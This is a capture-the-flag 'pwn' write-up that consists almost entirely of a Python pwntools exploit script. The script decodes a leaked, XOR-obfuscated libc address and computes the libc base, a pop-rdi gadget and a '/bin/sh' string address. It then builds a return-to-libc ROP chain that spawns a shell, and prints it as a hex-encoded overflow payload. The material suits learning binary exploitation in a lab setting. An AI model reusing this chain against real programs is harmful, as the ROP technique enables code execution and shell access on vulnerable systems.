Tags: pwn 

Rating:

> Write-up: https://uz56764.tistory.com/92

```
from pwn import *
# Local libc copy; its symbol offsets turn the leaked address into the
# other addresses computed further down.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

#0x7ffff7d7cd60
# The leak arrives on stdin as two lines (input() already strips each
# newline); they are joined and the final character is dropped.
first_line = input()
second_line = input()
a = (first_line + second_line)[:-1]

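def rlist(str):
    """Parse a whitespace-separated run of hex byte values into a list of ints.

    ``"7f 12 3"`` -> ``[0x7f, 0x12, 0x3]``.  Tokens may carry a ``0x`` prefix,
    runs of whitespace are tolerated, and an empty or all-whitespace string
    yields ``[]``.

    The parameter keeps its original name ``str`` so existing calls are
    unaffected; the builtin is not needed inside the function.

    Raises:
        ValueError: if a token is not a hexadecimal number.
    """
    # int(tok, 16) parses the text directly.  The original spliced the
    # stdin-derived text into a Python list expression and passed it to
    # eval(), which would execute anything embedded in the leak input.
    return [int(tok, 16) for tok in str.split()]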

# Newlines become separators so both leaked lines parse as one token list.
a = rlist(a.replace("\n", " "))
# Destination slot for each of the six leaked bytes: leaked bytes 0..2 land
# in positions 3..5 of the final 8-byte value, bytes 3..5 in positions 0..2.
a1 = [3, 4, 5, 0, 1, 2]

system_bytes = [0] * 8

# Every leaked byte was XORed with 0x41; undo that in place, then scatter the
# bytes into their slots.  The two top bytes stay zero.
for src, dst in enumerate(a1):
    a[src] ^= 0x41
    system_bytes[dst] = a[src]

system_rs = b"".join(b.to_bytes(1, "big") for b in system_bytes)
system_addr = u64(system_rs)

# Alternative the author used while debugging: system_addr = int(input(), 16)
libc_base = system_addr - libc.symbols['system']
# Gadget offset for this particular libc build (value from the write-up).
pop_rdi = libc_base + 0x000000000002a3e5
binsh = libc_base + list(libc.search(b'/bin/sh'))[0]

print(f'system_addr : {hex(system_addr)}')
print(f'pop_rdi : {hex(pop_rdi)}')
print(f'binsh : {hex(binsh)}')

# pop_rdi + 1 is one byte past the gadget (presumably the trailing ret).
ROP_chain = b"".join(p64(v) for v in (pop_rdi, binsh, pop_rdi + 1, system_addr))

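# Filler preceding the chain; the second part is 0x40 bytes worth of
# two-character cells.
pay = b'````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````'
pay += b'`' * (0x40 * 2)

# Each byte of the chain is emitted as two lowercase hex digits.  The original
# hand-rolled this nibble by nibble with "fail" checks that could never fire
# (a nibble always maps into '0'-'9' or 'a'-'f'); bytes.hex() yields the
# identical text.
pay += ROP_chain.hex().encode()

print(pay.decode())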
```

Original writeup (https://uz56764.tistory.com/92).